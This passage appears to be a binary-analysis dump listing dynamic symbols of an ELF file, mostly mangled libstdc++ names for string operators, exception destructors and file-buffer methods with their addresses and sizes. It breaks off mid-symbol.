                                                                                                                  _ZNSsaSEPKc.dynsym0x41030237FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsaSERKSs.dynsym0x40f4e037FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsixEm.dynsym0x40f2ec52FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSspLEPKc.dynsym0x40f70c37FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSspLERKSs.dynsym0x40f53037FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSspLEc.dynsym0x40f50641FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSt11logic_errorD1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt11range_errorD1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt12__basic_fileIcE8sys_openEiSt13_Ios_OpenmodeGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt12__basic_fileIcED1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt12domain_errorD1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt12length_errorD1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt12out_of_rangeD1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt12system_errorD1EvGLIBCXX_3.4.11libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt12system_errorD2EvGLIBCXX_3.4.11libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt13basic_filebufIcSt11char_traitsIcEE27_M_allocate_internal_bufferEvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt13basic_filebufIcSt11char_traitsIcEE4syncEvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt13basic_filebufIcSt11char_traitsIcEE5closeEvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSt13basic_fi